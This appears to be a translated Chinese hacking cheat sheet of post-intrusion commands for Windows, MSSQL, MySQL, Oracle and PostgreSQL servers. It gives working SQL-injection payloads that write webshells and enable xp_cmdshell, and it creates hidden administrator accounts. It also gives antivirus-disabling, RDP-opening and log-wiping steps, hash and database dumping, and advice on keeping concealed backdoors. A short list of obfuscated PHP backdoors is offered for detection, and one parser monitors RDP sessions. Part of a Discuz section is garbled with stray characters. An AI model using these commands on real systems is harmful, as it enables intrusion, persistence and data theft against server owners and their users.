1. net user administrator /passwordreq:no
This means "the administrator account does not require a password". If it executes successfully, the administrator password can be left blank when logging in over 3389 and you log straight in; once inside, run net user administrator /passwordreq:yes to restore the setting.
2. A neat way to create a clone account
First create an ordinary user.
Then export its registry key, and delete the user in Computer Management.
Then import the key again and add the account to the Administrators group.
3. Retrieving the Radmin password
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
4. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
Create a key named "services.exe" under it,
then under that key create a string value
whose data is the full path to the trojan.
5. runas /user:guest cmd
Tests the user's privileges!
6. tlntadmn config sec = -ntlm
exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
This simply uses the tlntadmn command. To learn more, run it with /? (this needs administrator privileges). Creating an identical user and passing NTLM authentication needs no explanation from me, right?
7. After the intrusion: patching holes, cleaning traces, placing backdoors:
The basic holes must be patched, e.g. SU privilege escalation and SA injection. For DBO injection, consider killing xp_treelist and xp_regread, and note down the web directory yourself. You absolutely must clean your traces. For SQL Server connections, Enterprise Manager is the better choice; Query Analyzer leaves records under HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers, delete them. When clearing IIS logs, do not use an AIO-type tool that wipes the whole log; use a logcleaner-type tool that deletes only the access records for a specified IP. If you can get the administrator's password via GINA, log in as him to clean the logs, then do the final trace cleanup with WYWZ. That said, manual cleaning is safer. Finally, leave a backdoor that produces no log entries: I never skip a few one-line backdoors, a standard backdoor and a cfm backdoor. Remember to adjust the timestamps. One more rather ruthless trick: if the machine is just an ordinary zombie, drop a TXT on the administrator's desktop telling him you broke in, planted such-and-such backdoor and added such-and-such user (not your real important backdoor, of course) and ask him to clean up. That gives you a good chance of keeping your real backdoor.
8. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
for example:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators aptime /add'

9. MSSQL Server 2005 has xp_cmdshell turned off by default.
To enable it, it must be switched on under the advanced options.
This can be done directly at the injection point:
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
Then: ;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
or
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
to restore cmdshell.

In Query Analyzer:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
Then: ;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
10. A new way to restore xp_cmdshell
After the extended stored procedures have been deleted there is a very simple way to restore them:
Deletion:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

Restore:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
This restores them directly, regardless of whether sp_addextendedproc still exists.

-----------------------------

Statement to delete the extended stored procedure xp_cmdshell:
exec sp_dropextendedproc 'xp_cmdshell'

SQL statement to restore cmdshell:
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

SQL statement to enable cmdshell:
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

Check whether the extended stored procedure exists:
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it is present.

Restore xp_cmdshell:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it worked.

Otherwise upload xplog70.dll:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'

SQL statement to block cmdshell:
sp_dropextendedproc "xp_cmdshell"
-------------------------
Clear the 3389 login records with a built-in system command:
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f

Then delete the Default.rdp file in the current account's My Documents folder.
View the current user's privileges in MySQL:
show grants for

The following statements grant privileges identical to root. You have probably run into this when taking over a site: MySQL's root user can only connect locally and rejects external connections. The method below solves that. The statements create a user itpro with password 123 and the same privileges as root, allowed to connect from any host, so you can conveniently operate the database remotely from your own machine.

Create USER 'itpro'@'%' IDENTIFIED BY '123';

GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

Remember to remove your footprints when you are done.

Drop USER 'itpro'@'%';

Drop DATABASE IF EXISTS `itpro`;

Get SYSTEM privileges as the current user:
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
sc start SuperCMD
Code:
<SCRIPT LANGUAGE="VBScript">
' creates the local user nosec via ADSI and adds it to the Administrators group
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","nosec")
od.SetPassword "123456abc!@#"
od.SetInfo
Set of=GetObject(os&"/nosec,user")
oe.add os&"/nosec"
</Script>
<script language=javascript>window.close();</script>

Bypassing the CAPTCHA restriction to get into the backend and get a shell
Code:
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000
Save as code.reg, import it into the registry, restart IE
and you are done.
Writing a shell via UNION
Code:
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*

Applied to the DedeCMS injection vulnerability: writes the shell without backend access.
When the DedeCMS backend has no file manager and there is no outfile privilege:
in Plugin Management -> Virus Scan,
write a one-liner into include/config_hand.php
Code:
>';?><?php @eval($_POST[cmd]);?>

in the format above.

In Oracle, after logging in as a low-privileged user, you can run the following statement to query the password hashes of sys and other users, then crack them with Cain:
Code:
select username,password from dba_users;

MySQL remote connection user
Code:

Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

1. Query the Terminal Services port

XP & 2003: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

Generic: regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg

2. Enable Terminal Services on XP & 2003

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3. Change the Terminal Services port to 20008 (0x4E28)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

4. Remove the XP & 2003 firewall restriction on the Terminal Services port 3389 and on connecting IPs

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f

5. Enable the Win2000 terminal on port 3389 (requires reboot)

echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg

6. Force a reboot of Win2000 & Win2003 (the system reboots automatically after the last line executes)

@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf

7. Disable TCP/IP port filtering (requires reboot)

REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

8. When the terminal has exceeded its maximum number of connections, use this command to connect:

mstsc /v:ip:3389 /console

9. Adjust NTFS partition permissions

cacls c: /e /t /g everyone:F (everyone gets full control of drive C)

cacls %systemroot%\system32\*.exe /d everyone (deny everyone access to the exe files in system32)

------------------------------------------------------
3389.vbs
' enables Terminal Services, sets the RDP port to 3389 via WMI StdRegProv, then reboots
On Error Resume Next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
Set R = CreateObject("WScript.Shell")
R.run("Shutdown.exe -f -r -t 0")

Delete the registry value for awgina.dll
Code:

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f

Code:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash

Set it to 1 to disable LM hashes.
Database security: common commands for intruding Oracle databases
I recently came across a server running Oracle; after cramming Oracle and consulting the experts I finally got all the user passwords for the site's backend admin interface. I found Oracle really troublesome to operate, so to save you brothers some detours I have compiled the commands needed during an intrusion.
1. su - oracle: not required; suitable when you do not have the DBA password, since it gets you into sqlplus without one.
2. sqlplus /nolog or sqlplus system/manager or ./sqlplus system/manager@ora9i;
3. SQL>connect / as sysdba ;(as sysoper) or
connect internal/oracle AS SYSDBA ;(scott/tiger)
conn sys/change_on_install as sysdba;
4. SQL>startup; starts the database instance
5. View all current databases: select * from v$database;
select name from v$database;
6. desc v$databases; view the database structure fields
7. How to see which users have SYSDBA or SYSOPER privileges:
SQL>select * from V_$PWFILE_USERS;
Show user; shows the current database connection user
8. Enter the test database: database test;
9. View all database instances: select * from v$instance;
e.g. ora9i
10. View all tables in the current database:
SQL> select TABLE_NAME from all_tables;
select * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
TABLE_NAME
------------------------------
_default_auditing_options_
11. View the table structure: desc all_tables;
12. Show all column definitions of CQI.T_BBS_XUSER:
desc CQI.T_BBS_XUSER;
13. Get the records in CQI.T_BBS_XUSER:
select * from CQI.T_BBS_XUSER;
14. Add a database user: (test11/test)
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
15. Grant user privileges:
grant connect,resource,dba to test11;
grant sysdba to test11;
commit;
16. Change a database user's password: (change the sys and system passwords to test)
alter user sys identified by test;
alter user system identified by test;

applicationContext-util.xml
applicationContext.xml
struts-config.xml
web.xml
server.xml
tomcat-users.xml
hibernate.cfg.xml
database_pool_config.xml

\WEB-INF\classes\hibernate.cfg.xml   database connection configuration
\WEB-INF\server.xml   similar to http.conf + mysql.ini + php.ini
\WEB-INF\struts-config.xml   file directory structure

spring.properties contains the name of the hibernate.cfg.xml file

C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml

If none of these can be found, look at the class files.

Test 1:
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

Test 2:
create table dirs(paths varchar(100),paths1 varchar(100), id int)

delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--

SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1

View the shared folders in a virtual machine:
in cmd inside the VM run:
\\.host\Shared Folders

Tricks for finding the terminal port from cmdshell
Finding the terminal:
Step 1: Tasklist /SVC lists all processes and system services with their PID values.
The service corresponding to the terminal is TermService.
Step 2: use netstat -ano to list all ports with their PID values,
and find the port that matches the PID.

Query the password hashes in SQL Server 2005:
SELECT password_hash FROM sys.sql_logins where name='sa'

SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
Exporting a shell from Access

Complete code for adding a user via MySQL on a Chinese-language operating system:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
drop table a;

English version:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
drop table a;

create table a (cmd BLOB);
insert into a values (CONVERT(<hex bytes of the trojan>,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\mm.exe'
drop table a;

Notes on dealing with that perverse Norton
Look up the path of the Norton service:
sc qc ccSetMgr
Then set permissions to deny access. Go all the way.
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone

Then restart the server:
iisreset /reboot
That does it. But when you are finished, remember to restore the permissions.
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin

EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')

Some notes on PostgreSQL injection
How to get a webshell:
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
How to read files:
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
http://127.0.0.1/postgresql.php?id=1;copy myfile from '/etc/passwd';
http://127.0.0.1/postgresql.php?id=1;select * from myfile;

There are two ways to execute commands: one needs a custom libc-backed function, the other uses PL/Python.
Of course, for these the PostgreSQL version must be above 8.x.
Create a system function:
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT

Create an output table:
CREATE TABLE stdout(id serial, system_out text)

Run the shell command, writing its output into the output table:
SELECT system('uname -a > /tmp/test')

Copy the output into the table:
COPY stdout(system_out) FROM '/tmp/test'

Read the echoed output back from the output table to check whether execution succeeded:

SELECT system_out FROM stdout

Below is a test example:

/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --

/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' STRICT --

/store.php?id=1; SELECT system('uname -a > /tmp/test') --

/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --

/store.php?id=1 UNION ALL SELECT NULL,(SELECT system_out FROM stdout ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
net stop sharedaccess   stops the default firewall
netsh firewall show   shows the default firewall configuration
netsh firewall set notifications disable   disables the notification shown when a program is blocked by the default firewall
netsh firewall add allowedprogram c:\1.exe Svchost   adds a program to the default firewall's allowed list

How to change the 3389 port (harder to find by scanning after the change)
Change the port setting on the server side; two places in the registry need modifying:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
PortNumber value, default 3389; change it to the desired port, e.g. 6000

Second place:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
PortNumber value, default 3389; change it to the desired port, e.g. 6000

That is all; reboot the system and it takes effect.

Script to monitor 3389 remote logins
Save it as a .bat file:
date /t >>D:\sec\TSlog\ts.log
time /t >>D:\sec\TSlog\ts.log
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
start Explorer
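The batch script above only greps netstat output for ":3389", so it misses a listener that was moved to 20008 (0x4E28) or 6000 as described earlier on this page. The following parser is an added example (not code from the original post): the RDP port and the trusted admin network are parameters, and the netstat sample is constructed.

```python
"""Added example (not from the original post): parse the output of
`netstat -n -p tcp` and report established Remote Desktop sessions. The RDP
port is a parameter because this page shows it being moved away from 3389;
on a real host read it from the two PortNumber registry values."""
import ipaddress
import re

# Constructed sample of `netstat -n -p tcp` output from a host whose RDP
# listener was moved to 20008 with the REG ADD commands shown on this page.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:20008          0.0.0.0:0              LISTENING
  TCP    192.168.1.10:80        192.168.1.55:51202     ESTABLISHED
  TCP    192.168.1.10:20008     203.0.113.7:49173      ESTABLISHED
  TCP    192.168.1.10:20008     198.51.100.23:1081     ESTABLISHED
  TCP    192.168.1.10:20008     192.168.1.55:51310     ESTABLISHED
  TCP    192.168.1.10:20008     192.168.1.55:51300     TIME_WAIT
"""

ROW = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s*$", re.I)


def parse_netstat(text):
    """Return (local_ip, local_port, remote_ip, remote_port, state) tuples."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            rows.append((m.group(1), int(m.group(2)),
                         m.group(3), int(m.group(4)), m.group(5).upper()))
    return rows


def rdp_sessions(text, rdp_port=3389):
    """Remote IPs with an ESTABLISHED connection to the RDP listener."""
    return [remote for _local, lport, remote, _rport, state in parse_netstat(text)
            if lport == rdp_port and state == "ESTABLISHED"]


def rdp_sessions_outside(text, rdp_port, allowed_networks):
    """RDP sessions whose peer is not inside any allowed CIDR range, i.e. the
    ones worth alerting on. Brackets are stripped so IPv6 peers parse too."""
    nets = [ipaddress.ip_network(n) for n in allowed_networks]
    flagged = []
    for remote in rdp_sessions(text, rdp_port):
        ip = ipaddress.ip_address(remote.strip("[]"))
        if not any(ip in net for net in nets):
            flagged.append(remote)
    return flagged


if __name__ == "__main__":
    for peer in rdp_sessions_outside(SAMPLE_NETSTAT, 20008, ["192.168.1.0/24"]):
        print("RDP session from outside the admin network:", peer)
```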
mstsc parameters:

Remote Desktop Connection

MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
 [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?

<Connection File> -- specifies the name of the .rdp file for the connection.

/v:<server[:port]> -- specifies the terminal server to connect to.

/console -- connects to the console session of the server.

/f -- starts the client in full-screen mode.

/w:<width> -- specifies the width of the remote desktop screen.

/h:<height> -- specifies the height of the remote desktop screen.

/edit -- opens the specified .rdp file for editing.

/migrate -- migrates legacy connection files created with Client Connection Manager to new .rdp connection files.

mstsc /console connects to session 0, whereas plain mstsc opens a separate virtual session, which amounts to a separate logon to the computer. In other words, connecting with the console parameter gets you the desktop shown on the monitor. Give it a try; it comes in handy at times, especially with some software that
mstsc /console /v:124.42.126.xxx   bypasses the limit on the number of terminal connections

Enable 3389 from the command line
net user asp.net aspnet /add
net localgroup Administrators asp.net /add
net localgroup "Remote Desktop Users" asp.net /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
sc config rasman start= auto
sc config remoteaccess start= auto
net start rasman
net start remoteaccess
Media
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

control userpasswords2   view the users' passwords
Export an Access database directly as a shell; requires that table a exists in the Access database and that you know the site's real path:
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
141. When doing manual MSSQL injection and you cannot write out of band, most people read the records one at a time, which is exhausting; a single statement can read out all the data (the Test 1 and Test 2 queries above, which use STUFF with FOR XML PATH('')).
How to shut down McAfee: // requires SYSTEM privileges; use at or psexec -s cmd.exe
You can upload .com files, e.g. nc.com, to bypass McAfee's executable restriction;
net stop mcafeeframework
net stop mcshield
net stop mcafeeengineservice
net stop mctaskmanager
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
Attachment: VNCDump.zip (4.76 KB)
Online password cracking: http://tools88.com/safe/vnc.php
The VNC password can be obtained directly with vncdump, or by querying the Password value under [HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] from the command line.

exec master..xp_cmdshell 'net user'
Executing commands in MSSQL.
Query to get the MSSQL password hashes:
select name,password from master.dbo.sysxlogins

backup log dbName with NO_LOG;
backup log dbName with TRUNCATE_ONLY;
DBCC SHRINKDATABASE(dbName);
MSSQL database shrinking

Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
Compresses game_db_201107170400.BAK into 1.rar as 200M volume files.

backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
Backs up the game database as game.bak at D:\WebSites\game.com\UpFileList\game.bak

Discuz!nt35渗透要点:
7 T3 g4 e/ ?' g6 h+ ^, @# C: A(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default$ Y3 d: G1 S Q; W$ S0 {
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>6 A4 z) J7 F% u: k3 e* E4 ^1 U
(3)保存。1 b4 p3 U7 Z S3 U
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass# X& D, |3 n5 Y
d:\rar.exe a -r d:\1.rar d:\website\8 M* @6 ?* F) {9 `
递归压缩website+ |0 S3 M* x# c+ y( G
注意rar.exe的路径( |) X2 o4 f5 s' y

<?php
$telok = "0${@eval($_POST[xxoo])}";
$username = "123456";
$userpwd = "123456";
$telhao = "123456";
$telinfo = "123456";
?>
PHP one-liner: a one-line trojan inserted into an unfiltered config value

Dumping the database when the web server and database server are separated
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
When constraints mean a full webshell cannot be written and only a one-liner is available, it is actually enough to do anything, just not very intuitive or convenient, for example dumping the database.
Here the webshell client's expert mode (writing your own code) is used.
ini_set('display_errors', 1);
set_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
$i = 0;
$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
    $i = $i+1;
    $tmp .= implode("::", $row)."\n";
    if(!($i%500)){ // write one file per 500 rows
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
        file_put_contents($filename,$tmp);
        $tmp = '';
    }
}
mysql_free_result($result);

// delete after downloading
ini_set('display_errors', 1);
error_reporting(E_ALL);
$i = 0;
while($i<32) {
    $i = $i+1;
    $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
    unlink($filename);
}
httprint: collect operating system fingerprints
Scan all ports of 192.168.1.100
nmap -PN -sT -sV -p0-65535 192.168.1.100
host -t ns www.owasp.org   identifies the name servers and obtains DNS information
host -l www.owasp.org ns1.secure.net   can be used to attempt a zone transfer for owasp.org
Netcraft DNS search service, at http://searchdns.netcraft.com/?host

Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (free registration required)
MSN search: http://search.msn.com syntax: "ip:x.x.x.x" (without the quotes)

Webhosting info: http://whois.webhosting.info/ syntax: http://whois.webhosting.info/x.x.x.x

DNSstuff: http://www.dnsstuff.com/ (several services available)
http://net-square.com/msnpawn/index.shtml (requires installation)

tomDNS: http://www.tomdns.net/ (some services are still private)

SEOlogs.com: http://www.seologs.com/ip-domains.html (reverse IP/domain lookup)
set names gb2312
Importing a database gives the error "Data too long for column 'username' at row 1". The cause is that Chinese characters are not supported.

MySQL password change
UPDATE mysql.user SET password=PASSWORD("newpass") where user="mysqladmin"
update user set password=PASSWORD('antian365.com') where user='root';
flush privileges;
Advanced PHP one-line trojan backdoors

Many advanced PHP one-line trojans were found during intrusions. Recording them here so they can later be searched for and removed by keyword
1.
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
// Caidao one-liner
2.
$filename=$_GET['xbid'];
include ($filename);
// dangerous include function, compiles and runs any file as PHP
3.
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
// rename any file
4.
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
// Caidao one-liner
5. include ($uid);
// dangerous include function, compiles and runs any file as PHP, via POST
// one-liner inserted into a gif
6. Typical one-liners
Backdoor code
<?php eval_r($_POST[sb])?>
Code
<?php @eval_r($_POST[sb])?>
// error-tolerant version
Code
<?php assert($_POST[sb]);?>
// use the expert mode of the lanker one-liner client to execute the relevant PHP statements
Code
<?$_POST['sa']($_POST['sb']);?>
Code
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
Code
